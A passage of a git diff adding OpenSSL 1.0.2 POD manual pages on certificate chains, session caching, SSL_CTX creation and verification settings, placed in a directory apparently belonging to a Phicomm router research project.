+SSL_CTX_clear_chain_certs() clears any existing chain associated with the
+current certificate of B<ctx>.  (This is implemented by calling
+SSL_CTX_set0_chain() with B<sk> set to B<NULL>).
+
+SSL_CTX_build_cert_chain() builds the certificate chain for B<ctx> normally
+this uses the chain store or the verify store if the chain store is not set.
+If the function is successful the built chain will replace any existing chain.
+The B<flags> parameter can be set to B<SSL_BUILD_CHAIN_FLAG_UNTRUSTED> to use
+existing chain certificates as untrusted CAs, B<SSL_BUILD_CHAIN_FLAG_NO_ROOT>
+to omit the root CA from the built chain, B<SSL_BUILD_CHAIN_FLAG_CHECK> to
+use all existing chain certificates only to build the chain (effectively
+sanity checking and rearranging them if necessary), the flag
+B<SSL_BUILD_CHAIN_FLAG_IGNORE_ERROR> ignores any errors during verification:
+if flag B<SSL_BUILD_CHAIN_FLAG_CLEAR_ERROR> is also set verification errors
+are cleared from the error queue.
+
+Each of these functions operates on the I<current> end entity
+(i.e. server or client) certificate. This is the last certificate loaded or
+selected on the corresponding B<ctx> structure.
+
+SSL_CTX_select_current_cert() selects B<x509> as the current end entity
+certificate, but only if B<x509> has already been loaded into B<ctx> using a
+function such as SSL_CTX_use_certificate().
+
+SSL_set0_chain(), SSL_set1_chain(), SSL_add0_chain_cert(),
+SSL_add1_chain_cert(), SSL_get0_chain_certs(), SSL_clear_chain_certs(),
+SSL_build_cert_chain(), SSL_select_current_cert() and SSL_set_current_cert()
+are similar except they apply to SSL structure B<ssl>.
+
+SSL_CTX_set_current_cert() changes the current certificate to a value based
+on the B<op> argument. Currently B<op> can be B<SSL_CERT_SET_FIRST> to use
+the first valid certificate or B<SSL_CERT_SET_NEXT> to set the next valid
+certificate after the current certificate. These two operations can be
+used to iterate over all certificates in an B<SSL_CTX> structure.
+
+SSL_set_current_cert() also supports the option B<SSL_CERT_SET_SERVER>.
+If B<ssl> is a server and has sent a certificate to a connected client
+this option sets that certificate to the current certificate and returns 1.
+If the negotiated ciphersuite is anonymous (and thus no certificate will
+be sent) 2 is returned and the current certificate is unchanged. If B<ssl>
+is not a server or a certificate has not been sent 0 is returned and
+the current certificate is unchanged.
+
+All these functions are implemented as macros. Those containing a B<1>
+increment the reference count of the supplied certificate or chain so it must
+be freed at some point after the operation. Those containing a B<0> do
+not increment reference counts and the supplied certificate or chain
+B<MUST NOT> be freed after the operation.
+
+=head1 NOTES
+
+The chains associate with an SSL_CTX structure are copied to any SSL
+structures when SSL_new() is called. SSL structures will not be affected
+by any chains subsequently changed in the parent SSL_CTX.
+
+One chain can be set for each key type supported by a server. So, for example,
+an RSA and a DSA certificate can (and often will) have different chains.
+
+The functions SSL_CTX_build_cert_chain() and SSL_build_cert_chain() can
+be used to check application configuration and to ensure any necessary
+subordinate CAs are sent in the correct order. Misconfigured applications
+sending incorrect certificate chains often cause problems with peers.
+
+For example an application can add any set of certificates using
+SSL_CTX_use_certificate_chain_file() then call SSL_CTX_build_cert_chain()
+with the option B<SSL_BUILD_CHAIN_FLAG_CHECK> to check and reorder them.
+
+Applications can issue non fatal warnings when checking chains by setting
+the flag B<SSL_BUILD_CHAIN_FLAG_IGNORE_ERRORS> and checking the return
+value.
+
+Calling SSL_CTX_build_cert_chain() or SSL_build_cert_chain() is more
+efficient than the automatic chain building as it is only performed once.
+Automatic chain building is performed on each new session.
+
+If any certificates are added using these functions no certificates added
+using SSL_CTX_add_extra_chain_cert() will be used.
+
+=head1 RETURN VALUES
+
+SSL_set_current_cert() with B<SSL_CERT_SET_SERVER> return 1 for success, 2 if
+no server certificate is used because the ciphersuites is anonymous and 0
+for failure.
+
+SSL_CTX_build_cert_chain() and SSL_build_cert_chain() return 1 for success
+and 0 for failure. If the flag B<SSL_BUILD_CHAIN_FLAG_IGNORE_ERROR> and
+a verification error occurs then 2 is returned.
+
+All other functions return 1 for success and 0 for failure.
+
+
+=head1 SEE ALSO
+
+L<SSL_CTX_add_extra_chain_cert(3)|SSL_CTX_add_extra_chain_cert(3)>
+
+=head1 HISTORY
+
+These functions were first added to OpenSSL 1.0.2.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_add_extra_chain_cert.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_add_extra_chain_cert.pod
new file mode 100644
index 0000000..8e832a5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_add_extra_chain_cert.pod
@@ -0,0 +1,60 @@
+=pod
+
+=head1 NAME
+
+SSL_CTX_add_extra_chain_cert - add certificate to chain
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ long SSL_CTX_add_extra_chain_cert(SSL_CTX ctx, X509 *x509)
+
+=head1 DESCRIPTION
+
+SSL_CTX_add_extra_chain_cert() adds the certificate B<x509> to the certificate
+chain presented together with the certificate. Several certificates
+can be added one after the other.
+
+=head1 NOTES
+
+When constructing the certificate chain, the chain will be formed from
+these certificates explicitly specified. If no chain is specified,
+the library will try to complete the chain from the available CA
+certificates in the trusted CA storage, see
+L<SSL_CTX_load_verify_locations(3)|SSL_CTX_load_verify_locations(3)>.
+
+The B<x509> certificate provided to SSL_CTX_add_extra_chain_cert() will be freed by the library when the B<SSL_CTX> is destroyed. An application B<should not> free the B<x509> object.
+
+=head1 RESTRICTIONS
+
+Only one set of extra chain certificates can be specified per SSL_CTX
+structure. Different chains for different certificates (for example if both
+RSA and DSA certificates are specified by the same server) or different SSL
+structures with the same parent SSL_CTX cannot be specified using this
+function. For more flexibility functions such as SSL_add1_chain_cert() should
+be used instead.
+
+=head1 RETURN VALUES
+
+SSL_CTX_add_extra_chain_cert() returns 1 on success. Check out the
+error stack to find out the reason for failure otherwise.
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>,
+L<SSL_CTX_use_certificate(3)|SSL_CTX_use_certificate(3)>,
+L<SSL_CTX_set_client_cert_cb(3)|SSL_CTX_set_client_cert_cb(3)>,
+L<SSL_CTX_load_verify_locations(3)|SSL_CTX_load_verify_locations(3)>
+L<SSL_CTX_set0_chain(3)|SSL_CTX_set0_chain(3)>
+L<SSL_CTX_set1_chain(3)|SSL_CTX_set1_chain(3)>
+L<SSL_CTX_add0_chain_cert(3)|SSL_CTX_add0_chain_cert(3)>
+L<SSL_CTX_add1_chain_cert(3)|SSL_CTX_add1_chain_cert(3)>
+L<SSL_set0_chain(3)|SSL_set0_chain(3)>
+L<SSL_set1_chain(3)|SSL_set1_chain(3)>
+L<SSL_add0_chain_cert(3)|SSL_add0_chain_cert(3)>
+L<SSL_add1_chain_cert(3)|SSL_add1_chain_cert(3)>
+L<SSL_CTX_build_cert_chain(3)|SSL_CTX_build_cert_chain(3)>
+L<SSL_build_cert_chain(3)|SSL_build_cert_chain(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_add_session.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_add_session.pod
new file mode 100644
index 0000000..c660a18
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_add_session.pod
@@ -0,0 +1,73 @@
+=pod
+
+=head1 NAME
+
+SSL_CTX_add_session, SSL_add_session, SSL_CTX_remove_session, SSL_remove_session - manipulate session cache
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ int SSL_CTX_add_session(SSL_CTX *ctx, SSL_SESSION *c);
+ int SSL_add_session(SSL_CTX *ctx, SSL_SESSION *c);
+
+ int SSL_CTX_remove_session(SSL_CTX *ctx, SSL_SESSION *c);
+ int SSL_remove_session(SSL_CTX *ctx, SSL_SESSION *c);
+
+=head1 DESCRIPTION
+
+SSL_CTX_add_session() adds the session B<c> to the context B<ctx>. The
+reference count for session B<c> is incremented by 1. If a session with
+the same session id already exists, the old session is removed by calling
+L<SSL_SESSION_free(3)|SSL_SESSION_free(3)>.
+
+SSL_CTX_remove_session() removes the session B<c> from the context B<ctx>.
+L<SSL_SESSION_free(3)|SSL_SESSION_free(3)> is called once for B<c>.
+
+SSL_add_session() and SSL_remove_session() are synonyms for their
+SSL_CTX_*() counterparts.
+
+=head1 NOTES
+
+When adding a new session to the internal session cache, it is examined
+whether a session with the same session id already exists. In this case
+it is assumed that both sessions are identical. If the same session is
+stored in a different SSL_SESSION object, The old session is
+removed and replaced by the new session. If the session is actually
+identical (the SSL_SESSION object is identical), SSL_CTX_add_session()
+is a no-op, and the return value is 0.
+
+If a server SSL_CTX is configured with the SSL_SESS_CACHE_NO_INTERNAL_STORE
+flag then the internal cache will not be populated automatically by new
+sessions negotiated by the SSL/TLS implementation, even though the internal
+cache will be searched automatically for session-resume requests (the
+latter can be suppressed by SSL_SESS_CACHE_NO_INTERNAL_LOOKUP). So the
+application can use SSL_CTX_add_session() directly to have full control
+over the sessions that can be resumed if desired.
+
+
+=head1 RETURN VALUES
+
+The following values are returned by all functions:
+
+=over 4
+
+=item Z<>0
+
+ The operation failed. In case of the add operation, it was tried to add
+ the same (identical) session twice. In case of the remove operation, the
+ session was not found in the cache.
+
+=item Z<>1
+ 
+ The operation succeeded.
+
+=back
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>,
+L<SSL_CTX_set_session_cache_mode(3)|SSL_CTX_set_session_cache_mode(3)>,
+L<SSL_SESSION_free(3)|SSL_SESSION_free(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_ctrl.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_ctrl.pod
new file mode 100644
index 0000000..fb6adcf
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_ctrl.pod
@@ -0,0 +1,34 @@
+=pod
+
+=head1 NAME
+
+SSL_CTX_ctrl, SSL_CTX_callback_ctrl, SSL_ctrl, SSL_callback_ctrl - internal handling functions for SSL_CTX and SSL objects
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ long SSL_CTX_ctrl(SSL_CTX *ctx, int cmd, long larg, void *parg);
+ long SSL_CTX_callback_ctrl(SSL_CTX *, int cmd, void (*fp)());
+
+ long SSL_ctrl(SSL *ssl, int cmd, long larg, void *parg);
+ long SSL_callback_ctrl(SSL *, int cmd, void (*fp)());
+
+=head1 DESCRIPTION
+
+The SSL_*_ctrl() family of functions is used to manipulate settings of
+the SSL_CTX and SSL objects. Depending on the command B<cmd> the arguments
+B<larg>, B<parg>, or B<fp> are evaluated. These functions should never
+be called directly. All functionalities needed are made available via
+other functions or macros.
+
+=head1 RETURN VALUES
+
+The return values of the SSL*_ctrl() functions depend on the command
+supplied via the B<cmd> parameter.
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_flush_sessions.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_flush_sessions.pod
new file mode 100644
index 0000000..148c36c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_flush_sessions.pod
@@ -0,0 +1,49 @@
+=pod
+
+=head1 NAME
+
+SSL_CTX_flush_sessions, SSL_flush_sessions - remove expired sessions
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ void SSL_CTX_flush_sessions(SSL_CTX *ctx, long tm);
+ void SSL_flush_sessions(SSL_CTX *ctx, long tm);
+
+=head1 DESCRIPTION
+
+SSL_CTX_flush_sessions() causes a run through the session cache of
+B<ctx> to remove sessions expired at time B<tm>.
+
+SSL_flush_sessions() is a synonym for SSL_CTX_flush_sessions().
+
+=head1 NOTES
+
+If enabled, the internal session cache will collect all sessions established
+up to the specified maximum number (see SSL_CTX_sess_set_cache_size()).
+As sessions will not be reused ones they are expired, they should be
+removed from the cache to save resources. This can either be done
+ automatically whenever 255 new sessions were established (see
+L<SSL_CTX_set_session_cache_mode(3)|SSL_CTX_set_session_cache_mode(3)>)
+or manually by calling SSL_CTX_flush_sessions(). 
+
+The parameter B<tm> specifies the time which should be used for the
+expiration test, in most cases the actual time given by time(0)
+will be used.
+
+SSL_CTX_flush_sessions() will only check sessions stored in the internal
+cache. When a session is found and removed, the remove_session_cb is however
+called to synchronize with the external cache (see
+L<SSL_CTX_sess_set_get_cb(3)|SSL_CTX_sess_set_get_cb(3)>).
+
+=head1 RETURN VALUES
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>,
+L<SSL_CTX_set_session_cache_mode(3)|SSL_CTX_set_session_cache_mode(3)>,
+L<SSL_CTX_set_timeout(3)|SSL_CTX_set_timeout(3)>,
+L<SSL_CTX_sess_set_get_cb(3)|SSL_CTX_sess_set_get_cb(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_free.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_free.pod
new file mode 100644
index 0000000..51d8676
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_free.pod
@@ -0,0 +1,41 @@
+=pod
+
+=head1 NAME
+
+SSL_CTX_free - free an allocated SSL_CTX object
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ void SSL_CTX_free(SSL_CTX *ctx);
+
+=head1 DESCRIPTION
+
+SSL_CTX_free() decrements the reference count of B<ctx>, and removes the
+SSL_CTX object pointed to by B<ctx> and frees up the allocated memory if the
+the reference count has reached 0.
+
+It also calls the free()ing procedures for indirectly affected items, if
+applicable: the session cache, the list of ciphers, the list of Client CAs,
+the certificates and keys.
+
+=head1 WARNINGS
+
+If a session-remove callback is set (SSL_CTX_sess_set_remove_cb()), this
+callback will be called for each session being freed from B<ctx>'s
+session cache. This implies, that all corresponding sessions from an
+external session cache are removed as well. If this is not desired, the user
+should explicitly unset the callback by calling
+SSL_CTX_sess_set_remove_cb(B<ctx>, NULL) prior to calling SSL_CTX_free().
+
+=head1 RETURN VALUES
+
+SSL_CTX_free() does not provide diagnostic information.
+
+=head1 SEE ALSO
+
+L<SSL_CTX_new(3)|SSL_CTX_new(3)>, L<ssl(3)|ssl(3)>,
+L<SSL_CTX_sess_set_get_cb(3)|SSL_CTX_sess_set_get_cb(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_get_ex_new_index.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_get_ex_new_index.pod
new file mode 100644
index 0000000..0c40a91
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_get_ex_new_index.pod
@@ -0,0 +1,53 @@
+=pod
+
+=head1 NAME
+
+SSL_CTX_get_ex_new_index, SSL_CTX_set_ex_data, SSL_CTX_get_ex_data - internal application specific data functions
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ int SSL_CTX_get_ex_new_index(long argl, void *argp,
+                CRYPTO_EX_new *new_func,
+                CRYPTO_EX_dup *dup_func,
+                CRYPTO_EX_free *free_func);
+
+ int SSL_CTX_set_ex_data(SSL_CTX *ctx, int idx, void *arg);
+
+ void *SSL_CTX_get_ex_data(const SSL_CTX *ctx, int idx);
+
+ typedef int new_func(void *parent, void *ptr, CRYPTO_EX_DATA *ad,
+                int idx, long argl, void *argp);
+ typedef void free_func(void *parent, void *ptr, CRYPTO_EX_DATA *ad,
+                int idx, long argl, void *argp);
+ typedef int dup_func(CRYPTO_EX_DATA *to, CRYPTO_EX_DATA *from, void *from_d,
+                int idx, long argl, void *argp);
+
+=head1 DESCRIPTION
+
+Several OpenSSL structures can have application specific data attached to them.
+These functions are used internally by OpenSSL to manipulate application
+specific data attached to a specific structure.
+
+SSL_CTX_get_ex_new_index() is used to register a new index for application
+specific data.
+
+SSL_CTX_set_ex_data() is used to store application data at B<arg> for B<idx>
+into the B<ctx> object.
+
+SSL_CTX_get_ex_data() is used to retrieve the information for B<idx> from
+B<ctx>.
+
+A detailed description for the B<*_get_ex_new_index()> functionality
+can be found in L<RSA_get_ex_new_index(3)|RSA_get_ex_new_index(3)>.
+The B<*_get_ex_data()> and B<*_set_ex_data()> functionality is described in
+L<CRYPTO_set_ex_data(3)|CRYPTO_set_ex_data(3)>.
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>,
+L<RSA_get_ex_new_index(3)|RSA_get_ex_new_index(3)>,
+L<CRYPTO_set_ex_data(3)|CRYPTO_set_ex_data(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_get_verify_mode.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_get_verify_mode.pod
new file mode 100644
index 0000000..2a3747e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_get_verify_mode.pod
@@ -0,0 +1,50 @@
+=pod
+
+=head1 NAME
+
+SSL_CTX_get_verify_mode, SSL_get_verify_mode, SSL_CTX_get_verify_depth, SSL_get_verify_depth, SSL_get_verify_callback, SSL_CTX_get_verify_callback - get currently set verification parameters
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ int SSL_CTX_get_verify_mode(const SSL_CTX *ctx);
+ int SSL_get_verify_mode(const SSL *ssl);
+ int SSL_CTX_get_verify_depth(const SSL_CTX *ctx);
+ int SSL_get_verify_depth(const SSL *ssl);
+ int (*SSL_CTX_get_verify_callback(const SSL_CTX *ctx))(int, X509_STORE_CTX *);
+ int (*SSL_get_verify_callback(const SSL *ssl))(int, X509_STORE_CTX *);
+
+=head1 DESCRIPTION
+
+SSL_CTX_get_verify_mode() returns the verification mode currently set in
+B<ctx>.
+
+SSL_get_verify_mode() returns the verification mode currently set in
+B<ssl>.
+
+SSL_CTX_get_verify_depth() returns the verification depth limit currently set
+in B<ctx>. If no limit has been explicitly set, -1 is returned and the
+default value will be used.
+
+SSL_get_verify_depth() returns the verification depth limit currently set
+in B<ssl>. If no limit has been explicitly set, -1 is returned and the
+default value will be used.
+
+SSL_CTX_get_verify_callback() returns a function pointer to the verification
+callback currently set in B<ctx>. If no callback was explicitly set, the
+NULL pointer is returned and the default callback will be used.
+
+SSL_get_verify_callback() returns a function pointer to the verification
+callback currently set in B<ssl>. If no callback was explicitly set, the
+NULL pointer is returned and the default callback will be used.
+
+=head1 RETURN VALUES
+
+See DESCRIPTION
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>, L<SSL_CTX_set_verify(3)|SSL_CTX_set_verify(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_load_verify_locations.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_load_verify_locations.pod
new file mode 100644
index 0000000..d1d8977
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_load_verify_locations.pod
@@ -0,0 +1,124 @@
+=pod
+
+=head1 NAME
+
+SSL_CTX_load_verify_locations - set default locations for trusted CA
+certificates
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ int SSL_CTX_load_verify_locations(SSL_CTX *ctx, const char *CAfile,
+                                   const char *CApath);
+
+=head1 DESCRIPTION
+
+SSL_CTX_load_verify_locations() specifies the locations for B<ctx>, at
+which CA certificates for verification purposes are located. The certificates
+available via B<CAfile> and B<CApath> are trusted.
+
+=head1 NOTES
+
+If B<CAfile> is not NULL, it points to a file of CA certificates in PEM
+format. The file can contain several CA certificates identified by
+
+ -----BEGIN CERTIFICATE-----
+ ... (CA certificate in base64 encoding) ...
+ -----END CERTIFICATE-----
+
+sequences. Before, between, and after the certificates text is allowed
+which can be used e.g. for descriptions of the certificates.
+
+The B<CAfile> is processed on execution of the SSL_CTX_load_verify_locations()
+function.
+
+If B<CApath> is not NULL, it points to a directory containing CA certificates
+in PEM format. The files each contain one CA certificate. The files are
+looked up by the CA subject name hash value, which must hence be available.
+If more than one CA certificate with the same name hash value exist, the
+extension must be different (e.g. 9d66eef0.0, 9d66eef0.1 etc). The search
+is performed in the ordering of the extension number, regardless of other
+properties of the certificates.
+Use the B<c_rehash> utility to create the necessary links.
+
+The certificates in B<CApath> are only looked up when required, e.g. when
+building the certificate chain or when actually performing the verification
+of a peer certificate.
+
+When looking up CA certificates, the OpenSSL library will first search the
+certificates in B<CAfile>, then those in B<CApath>. Certificate matching
+is done based on the subject name, the key identifier (if present), and the
+serial number as taken from the certificate to be verified. If these data
+do not match, the next certificate will be tried. If a first certificate
+matching the parameters is found, the verification process will be performed;
+no other certificates for the same parameters will be searched in case of
+failure.
+
+In server mode, when requesting a client certificate, the server must send
+the list of CAs of which it will accept client certificates. This list
+is not influenced by the contents of B<CAfile> or B<CApath> and must
+explicitly be set using the
+L<SSL_CTX_set_client_CA_list(3)|SSL_CTX_set_client_CA_list(3)>
+family of functions.
+
+When building its own certificate chain, an OpenSSL client/server will
+try to fill in missing certificates from B<CAfile>/B<CApath>, if the
+certificate chain was not explicitly specified (see
+L<SSL_CTX_add_extra_chain_cert(3)|SSL_CTX_add_extra_chain_cert(3)>,
+L<SSL_CTX_use_certificate(3)|SSL_CTX_use_certificate(3)>.
+
+=head1 WARNINGS
+
+If several CA certificates matching the name, key identifier, and serial
+number condition are available, only the first one will be examined. This
+may lead to unexpected results if the same CA certificate is available
+with different expiration dates. If a "certificate expired" verification
+error occurs, no other certificate will be searched. Make sure to not
+have expired certificates mixed with valid ones.
+
+=head1 EXAMPLES
+
+Generate a CA certificate file with descriptive text from the CA certificates
+ca1.pem ca2.pem ca3.pem:
+
+ #!/bin/sh
+ rm CAfile.pem
+ for i in ca1.pem ca2.pem ca3.pem ; do
+   openssl x509 -in $i -text >> CAfile.pem
+ done
+
+Prepare the directory /some/where/certs containing several CA certificates
+for use as B<CApath>:
+
+ cd /some/where/certs
+ c_rehash .
+
+=head1 RETURN VALUES
+
+The following return values can occur:
+
+=over 4
+
+=item Z<>0
+
+The operation failed because B<CAfile> and B<CApath> are NULL or the
+processing at one of the locations specified failed. Check the error
+stack to find out the reason.
+
+=item Z<>1
+
+The operation succeeded.
+
+=back
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>,
+L<SSL_CTX_set_client_CA_list(3)|SSL_CTX_set_client_CA_list(3)>,
+L<SSL_get_client_CA_list(3)|SSL_get_client_CA_list(3)>,
+L<SSL_CTX_use_certificate(3)|SSL_CTX_use_certificate(3)>,
+L<SSL_CTX_add_extra_chain_cert(3)|SSL_CTX_add_extra_chain_cert(3)>,
+L<SSL_CTX_set_cert_store(3)|SSL_CTX_set_cert_store(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_new.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_new.pod
new file mode 100644
index 0000000..491ac8c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_new.pod
@@ -0,0 +1,108 @@
+=pod
+
+=head1 NAME
+
+SSL_CTX_new - create a new SSL_CTX object as framework for TLS/SSL enabled functions
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ SSL_CTX *SSL_CTX_new(const SSL_METHOD *method);
+
+=head1 DESCRIPTION
+
+SSL_CTX_new() creates a new B<SSL_CTX> object as framework to establish
+TLS/SSL enabled connections.
+
+=head1 NOTES
+
+The SSL_CTX object uses B<method> as connection method. The methods exist
+in a generic type (for client and server use), a server only type, and a
+client only type. B<method> can be of the following types:
+
+=over 4
+
+=item SSLv2_method(void), SSLv2_server_method(void), SSLv2_client_method(void)
+
+A TLS/SSL connection established with these methods will only understand
+the SSLv2 protocol. A client will send out SSLv2 client hello messages
+and will also indicate that it only understand SSLv2. A server will only
+understand SSLv2 client hello messages.
+
+=item SSLv3_method(void), SSLv3_server_method(void), SSLv3_client_method(void)
+
+A TLS/SSL connection established with these methods will only understand the
+SSLv3 protocol. A client will send out SSLv3 client hello messages
+and will indicate that it only understands SSLv3. A server will only understand
+SSLv3 client hello messages. This especially means, that it will
+not understand SSLv2 client hello messages which are widely used for
+compatibility reasons, see SSLv23_*_method().
+
+=item TLSv1_method(void), TLSv1_server_method(void), TLSv1_client_method(void)
+
+A TLS/SSL connection established with these methods will only understand the
+TLSv1 protocol. A client will send out TLSv1 client hello messages
+and will indicate that it only understands TLSv1. A server will only understand
+TLSv1 client hello messages. This especially means, that it will
+not understand SSLv2 client hello messages which are widely used for
+compatibility reasons, see SSLv23_*_method(). It will also not understand
+SSLv3 client hello messages.
+
+=item SSLv23_method(void), SSLv23_server_method(void), SSLv23_client_method(void)
+
+A TLS/SSL connection established with these methods may understand the SSLv2,
+SSLv3, TLSv1, TLSv1.1 and TLSv1.2 protocols.
+
+If the cipher list does not contain any SSLv2 ciphersuites (the default
+cipher list does not) or extensions are required (for example server name)
+a client will send out TLSv1 client hello messages including extensions and
+will indicate that it also understands TLSv1.1, TLSv1.2 and permits a
+fallback to SSLv3. A server will support SSLv3, TLSv1, TLSv1.1 and TLSv1.2
+protocols. This is the best choice when compatibility is a concern.
+
+If any SSLv2 ciphersuites are included in the cipher list and no extensions
+are required then SSLv2 compatible client hellos will be used by clients and
+SSLv2 will be accepted by servers. This is B<not> recommended due to the
+insecurity of SSLv2 and the limited nature of the SSLv2 client hello
+prohibiting the use of extensions.
+
+=back
+
+The list of protocols available can later be limited using the SSL_OP_NO_SSLv2,
+SSL_OP_NO_SSLv3, SSL_OP_NO_TLSv1, SSL_OP_NO_TLSv1_1 and SSL_OP_NO_TLSv1_2
+options of the SSL_CTX_set_options() or SSL_set_options() functions.
+Using these options it is possible to choose e.g. SSLv23_server_method() and
+be able to negotiate with all possible clients, but to only allow newer
+protocols like TLSv1, TLSv1.1 or TLS v1.2.
+
+Applications which never want to support SSLv2 (even is the cipher string
+is configured to use SSLv2 ciphersuites) can set SSL_OP_NO_SSLv2.
+
+SSL_CTX_new() initializes the list of ciphers, the session cache setting,
+the callbacks, the keys and certificates and the options to its default
+values.
+
+=head1 RETURN VALUES
+
+The following return values can occur:
+
+=over 4
+
+=item NULL
+
+The creation of a new SSL_CTX object failed. Check the error stack to
+find out the reason.
+
+=item Pointer to an SSL_CTX object
+
+The return value points to an allocated SSL_CTX object.
+
+=back
+
+=head1 SEE ALSO
+
+L<SSL_CTX_free(3)|SSL_CTX_free(3)>, L<SSL_accept(3)|SSL_accept(3)>,
+L<ssl(3)|ssl(3)>,  L<SSL_set_connect_state(3)|SSL_set_connect_state(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_sess_number.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_sess_number.pod
new file mode 100644
index 0000000..19aa4e2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_sess_number.pod
@@ -0,0 +1,76 @@
+=pod
+
+=head1 NAME
+
+SSL_CTX_sess_number, SSL_CTX_sess_connect, SSL_CTX_sess_connect_good, SSL_CTX_sess_connect_renegotiate, SSL_CTX_sess_accept, SSL_CTX_sess_accept_good, SSL_CTX_sess_accept_renegotiate, SSL_CTX_sess_hits, SSL_CTX_sess_cb_hits, SSL_CTX_sess_misses, SSL_CTX_sess_timeouts, SSL_CTX_sess_cache_full - obtain session cache statistics
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ long SSL_CTX_sess_number(SSL_CTX *ctx);
+ long SSL_CTX_sess_connect(SSL_CTX *ctx);
+ long SSL_CTX_sess_connect_good(SSL_CTX *ctx);
+ long SSL_CTX_sess_connect_renegotiate(SSL_CTX *ctx);
+ long SSL_CTX_sess_accept(SSL_CTX *ctx);
+ long SSL_CTX_sess_accept_good(SSL_CTX *ctx);
+ long SSL_CTX_sess_accept_renegotiate(SSL_CTX *ctx);
+ long SSL_CTX_sess_hits(SSL_CTX *ctx);
+ long SSL_CTX_sess_cb_hits(SSL_CTX *ctx);
+ long SSL_CTX_sess_misses(SSL_CTX *ctx);
+ long SSL_CTX_sess_timeouts(SSL_CTX *ctx);
+ long SSL_CTX_sess_cache_full(SSL_CTX *ctx);
+
+=head1 DESCRIPTION
+
+SSL_CTX_sess_number() returns the current number of sessions in the internal
+session cache.
+
+SSL_CTX_sess_connect() returns the number of started SSL/TLS handshakes in
+client mode.
+
+SSL_CTX_sess_connect_good() returns the number of successfully established
+SSL/TLS sessions in client mode.
+
+SSL_CTX_sess_connect_renegotiate() returns the number of start renegotiations
+in client mode.
+
+SSL_CTX_sess_accept() returns the number of started SSL/TLS handshakes in
+server mode.
+
+SSL_CTX_sess_accept_good() returns the number of successfully established
+SSL/TLS sessions in server mode.
+
+SSL_CTX_sess_accept_renegotiate() returns the number of start renegotiations
+in server mode.
+
+SSL_CTX_sess_hits() returns the number of successfully reused sessions.
